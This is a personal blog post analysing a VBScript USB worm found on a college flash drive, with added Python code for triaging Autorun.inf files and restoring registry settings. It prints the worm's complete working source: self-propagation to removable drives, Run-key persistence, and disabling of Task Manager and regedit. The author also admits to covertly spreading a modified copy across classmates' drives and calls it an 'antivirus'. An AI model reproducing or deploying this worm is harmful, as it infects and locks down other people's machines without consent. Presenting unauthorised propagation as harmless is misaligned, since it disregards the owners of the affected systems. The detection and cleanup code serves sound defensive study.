Virus Became Antivirus


After a long time, while receiving some data from a professor at college, I pushed my JetFlash drive into the USB port of the computer there. A scanning process appeared and closed, and I was satisfied. When I opened my flash drive I found all the data my professor had given me, along with one extra file: a readme. I thought it was new, so I opened it; there was only some garbage written in that file, so I deleted it.

But there it was again. I deleted it again, and again it came back. I didn't know what it was, so I tried to open Task Manager. Nope, it didn't open. Then I tried msconfig and the registry editor, but even those were blocked; everything on my computer was locked down. This was exciting. Not because I had work to do, or because I had started to love getting infected, but because tinkering around with it would finally get me some code. So my greed for a nifty piece of code began.

All of this happened on Windows, so I restarted the PC and booted into Linux (oh yes, the lovely Ubuntu live DVD). From there I could open the Windows files, so I browsed to system32 and checked those files. I also inserted the infected flash drive again, but don't worry: whatever it does, it cannot play with my lovely Linux. This time I found three extra files on the drive:

An idiotic readme
Ujbright_Antivirus.vbs
Autorun.inf

What interested me was the second file. In it, of course, I found a script. I opened it and found the real program and the logic built into it: a Windows script destined to run again and again after a set interval. All it did, though, was not corrupt anything but preserve its own existence and copy itself onto every flash drive it saw. This is the script from that second file (the comparison operators and quote characters below were mangled by the blog's formatting and have been restored):

```vbscript
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)          ' the Windows folder
tf = WScript.ScriptFullName            ' full path of the running copy
x = LCase(tf)
' if launched as <drive>:\UjBright_Antivirus.vbs, open Explorer on that drive
If Mid(x, 4) = "UjBright_Antivirus.vbs" Then
    wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
' read its own source text so it can write copies of itself later
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
    scrText = scrText & myFile.ReadLine & vbCrLf
Loop
' drop a copy into the Windows folder and register it under the Run key
ax = fso.FileExists(win & "\UjBright_Antivirus.vbs")
Set myFile = fso.CreateTextFile(win & "\UjBright_Antivirus.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus.vbs")
fAttr.Attributes = 39                  ' 32 archive + 4 system + 2 hidden + 1 read-only
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\UjBright_Antivirus.vbs"""
If ax = false Then wscr.Run "wscript.exe """ & win & "\UjBright_Antivirus.vbs"""

While (true)
    Set myDrives = fso.Drives
    For Each myFlashDrive In myDrives
        ' DriveType 1 = removable; skip the floppy
        If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
            If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
                Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
                fAttr.Attributes = 32
                fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
            End If
            Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
            auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf & "open=wscript.exe UjBright_Antivirus.vbs" & vbCrLf & "shell\Open\Command=wscript.exe UjBright_Antivirus.vbs" & vbCrLf & "shell\Open\Default=1"
            auFile.close
            Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\README.txt", true)
            auFile.write "Hello FRIENDS:" & vbCrLf & "Maaaring virus ito kung tawagin at makikita ng ibang ANTI-VIRUS, ngunit wag mag-alala kung ito'y hindi makikilala ng anu mang ANTI-VIRUS na nasa sa inyo." & vbCrLf & "Dahil ito ang tanging paraan ko upang matugunan ang ibang ANTI-VIRUS na hindi makikilala ang ganitong SCRIPTO na VIRUS na nakakasama" & vbCrLf & "ay kaya nitong PALITAN na maaring ayusin niya ang ibang sinira dulot ng NAKAKASIRA na VIRUS." & vbCrLf & " " & vbCrLf & "-A-D-V-E-R-T-I-S-I-N-G-" & vbCrLf & "EARLY ADVENT ADVERTISING - Tarpaulin nila ay durable matagal kumupas, tag-init man o tag-araw." & vbCrLf & "RB PHOTOART STUDIO - May kagandahan sa kulay ng inyong PICTURE at durable pa." & vbCrLf & "104.1 DXMA WOW FM - Pinakikinggang himpilan ng RADIO. Numero UNO sa Central Mindanao." & vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" & vbCrLf & "JUST CONTACT ME: 09083223171 - UJBRIGHT"
            auFile.close
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes = 39
            Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\UjBright_Antivirus.vbs", true)
            myFile.write scrText
            myFile.close
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\UjBright_Antivirus.vbs")
            fAttr.Attributes = 39
        End If
    Next
    ' per-user Explorer settings and policies, rewritten on every pass
    With wscr
        .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\UjBright_Antivirus.vbs"""
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1, "REG_DWORD"
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
        .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
    End With
    ' a copy running from a flash drive exits once that drive is pulled
    If tf <> win & "\UjBright_Antivirus.vbs" Then
        If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
    End If
    WScript.Sleep 10000                ' 10000 ms, then rescan
Wend
```

Big scary file, isn't it? Well, not quite, actually. If you have programmed with scripts before, it won't really be difficult to follow. After looking at the code for a while, I figured out what it did. Here it is in brief:

Checks for flash drives.
Checks whether autorun, readme and script are present.
If not, writes Autorun.inf and a copy of the script.
Writes the readme garbage.
Hides file extensions, disables regedit, etc.
Sleeps (WScript.Sleep 10000), then loops.
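The behaviour summarised above leaves two things on a drive that an analyst can check without running anything: the Autorun.inf and the attribute masks on the dropped files. The following is an added example, not code from the original post. It parses an Autorun.inf of the kind the script writes (a plain INI parser would silently collapse the two `open=` lines), lists every value that would make Windows launch a program, flags the ones that invoke a script host, and decodes the numeric mask 39 the script sets. The Autorun.inf text and the directory listing are constructed to match what the post reports; no real drive is touched.

```python
"""Offline triage of an autorun dropper's footprint on a removable drive."""

# FILE_ATTRIBUTE_* bit values from the Win32 API
ATTRIBUTE_BITS = {1: "READONLY", 2: "HIDDEN", 4: "SYSTEM", 16: "DIRECTORY", 32: "ARCHIVE"}

# Program names that turn an Autorun entry into script execution
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe")


def decode_attributes(mask):
    """Expand a numeric attribute mask into the flag names it contains."""
    return [name for bit, name in sorted(ATTRIBUTE_BITS.items()) if mask & bit]


def parse_autorun(text):
    """Parse the [autorun] section, keeping duplicate keys in order."""
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            entries.setdefault(key.strip().lower(), []).append(value.strip())
    return entries


def launch_commands(entries):
    """Every command line the Autorun.inf would hand to Windows.

    'open=' fires on insertion where AutoRun is enabled; 'shell\\<verb>\\command='
    fires when the user picks that verb, and 'shell\\Open\\Default=1' makes
    Open the double-click default.
    """
    commands = []
    for key, values in entries.items():
        if key == "open" or (key.startswith("shell\\") and key.endswith("\\command")):
            commands.extend(v for v in values if v)
    return commands


def is_script_launch(command):
    """True when the command line invokes a script host or a script file."""
    lower = command.lower()
    return any(host in lower for host in SCRIPT_HOSTS) or lower.endswith((".vbs", ".js", ".wsf"))


def triage(autorun_text, listing):
    """Summarise an Autorun.inf plus a {filename: attribute_mask} listing.

    Files that are both HIDDEN and SYSTEM stay invisible under Explorer's
    default settings, which is the combination mask 39 produces.
    """
    entries = parse_autorun(autorun_text)
    commands = launch_commands(entries)
    return {
        "commands": commands,
        "script_launches": [c for c in commands if is_script_launch(c)],
        "hidden_system_files": sorted(
            name for name, mask in listing.items()
            if {"HIDDEN", "SYSTEM"} <= set(decode_attributes(mask))
        ),
    }


# Constructed sample: the Autorun.inf text the script writes, and the masks it
# applies (39 to the files it drops; 32 is an ordinary file).
SAMPLE_AUTORUN = (
    "[autorun]\r\n"
    "open=\\\r\n"
    "open=wscript.exe UjBright_Antivirus.vbs\r\n"
    "shell\\Open\\Command=wscript.exe UjBright_Antivirus.vbs\r\n"
    "shell\\Open\\Default=1"
)
SAMPLE_LISTING = {
    "Autorun.inf": 39,
    "UjBright_Antivirus.vbs": 39,
    "README.txt": 32,
    "lecture_notes.pdf": 32,
}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_AUTORUN, SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

On a real drive the listing would come from `os.scandir` with `st_file_attributes` on Windows, or from the attributes `ls -l` cannot show but `fatattr`/`mtools` can on Linux; the parser and the flag check are the same either way.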

So in short it was a nice little script that could be modified. You can see those end parts where the registry editor and Task Manager are disabled, hidden files are hidden, extensions are hidden, etc.:

```vbscript
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\UjBright_Antivirus.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
```

All I had to do was turn the 1s to 0s, selecting the parts I wanted by setting them to 1 if needed and 0 otherwise. That's it. Now all it does is write that readme garbage onto the flash drive, a tamed version of the virus script.
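The same registry values are what an infected machine has to get back from the other side: the Run entry is the persistence, and the policy values are why Task Manager and regedit would not open. The following is an added example, not part of the original post. It holds a table of the values the script writes (taken from the script) together with a restoring value for each, compares a snapshot of the current registry state against it, and renders the mismatches as a .reg file that regedit can import once the wscript.exe process has been ended. The snapshot is a constructed dict standing in for what `winreg` or `reg export` would return; the `C:\WINDOWS` path in it is a placeholder for whatever `GetSpecialFolder(0)` resolved to.

```python
"""Detect and undo the Explorer/policy lockdown an autorun dropper applies."""

HKCU = "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
HKLM_RUN = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"

# (key path, value name): (what the script writes, what to restore).
# A restore value of None means "delete the value". The 'Hidden' value is
# left out: the dropped files carry the SYSTEM attribute, so ShowSuperHidden
# is the setting that actually governs whether they are displayed.
LOCKDOWN = {
    (HKLM_RUN, "autoMe"): ("wscript.exe", None),                    # persistence entry
    (HKCU + "\\Explorer\\Advanced", "HideFileExt"): (1, 0),          # 0: show extensions
    (HKCU + "\\Explorer\\Advanced", "ShowSuperHidden"): (0, 1),      # 1: show system+hidden files
    (HKCU + "\\Policies\\Explorer", "NoFolderOptions"): (1, 0),
    (HKCU + "\\Policies\\Explorer", "NoDriveTypeAutoRun"): (128, 255),  # 0xFF: no AutoRun on any drive type
    (HKCU + "\\Policies\\System", "DisableRegistryTools"): (1, 0),
    (HKCU + "\\Policies\\System", "DisableTaskMgr"): (1, 0),
}


def assess(snapshot):
    """One finding per lockdown value that is present and not at its restored state.

    snapshot maps (key path, value name) -> current value; missing entries
    mean the value does not exist, and Windows then applies its default,
    which for every policy here means 'not restricted', so they are skipped.
    """
    findings = []
    for (path, name), (written, restore) in LOCKDOWN.items():
        current = snapshot.get((path, name))
        if current is None:
            continue
        if restore is None or current != restore:
            if isinstance(written, str):
                matches = isinstance(current, str) and written.lower() in current.lower()
            else:
                matches = current == written
            findings.append({"path": path, "name": name, "current": current,
                             "restore": restore, "matches_script": matches})
    return findings


def build_undo_reg(findings):
    """Render findings as a .reg file: '=-' deletes a value, dword: sets one."""
    by_key = {}
    for f in findings:
        by_key.setdefault(f["path"], []).append(f)
    lines = ["Windows Registry Editor Version 5.00", ""]
    for path, items in by_key.items():
        lines.append(f"[{path}]")
        for f in items:
            if f["restore"] is None:
                lines.append(f'"{f["name"]}"=-')
            else:
                lines.append(f'"{f["name"]}"=dword:{f["restore"]:08x}')
        lines.append("")
    return "\r\n".join(lines)


# Constructed snapshot of a machine after the script has run its With block.
INFECTED = {
    (HKLM_RUN, "autoMe"): 'wscript.exe "C:\\WINDOWS\\UjBright_Antivirus.vbs"',
    (HKCU + "\\Explorer\\Advanced", "HideFileExt"): 1,
    (HKCU + "\\Explorer\\Advanced", "ShowSuperHidden"): 0,
    (HKCU + "\\Policies\\Explorer", "NoFolderOptions"): 1,
    (HKCU + "\\Policies\\Explorer", "NoDriveTypeAutoRun"): 128,
    (HKCU + "\\Policies\\System", "DisableRegistryTools"): 1,
    (HKCU + "\\Policies\\System", "DisableTaskMgr"): 1,
}

if __name__ == "__main__":
    found = assess(INFECTED)
    for f in found:
        flag = "script value" if f["matches_script"] else "other value"
        print(f'{f["name"]}: {f["current"]} -> {f["restore"]} ({flag})')
    print(build_undo_reg(found))
```

The `matches_script` flag separates the dropper's exact values from a policy an administrator set on purpose (a domain-managed `DisableTaskMgr`, say), which should not be undone blindly. Importing the .reg file only matters after the script's process is gone, since the loop rewrites every one of these values on each pass.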

By the way, the readme turned out to be a message in another language. So I copied and pasted it into Google Translate. It said something like "No antivirus can remove me" and "if you want to advertise like this, call me at this number", which showed it to be the work of some little guy trying to be over-smart. Anyway, this code really helps me now. How? :p

Well, I have used it to spread a NIBBLE tag (my technical community) onto all the flash drives at college. No one has a clue. But I guess now they surely will, seeing that I have confessed here what I did.

You may also wonder where it turned into an antivirus. Well, that is what I call it. Many other viruses cause harm through that little Autorun on a flash drive. But such an Autorun will now be removed and replaced by the harmless Autorun of my tamed virus. So open your pen drive with courage and delete away those unnecessary files, if any. That's what I call an antivirus.
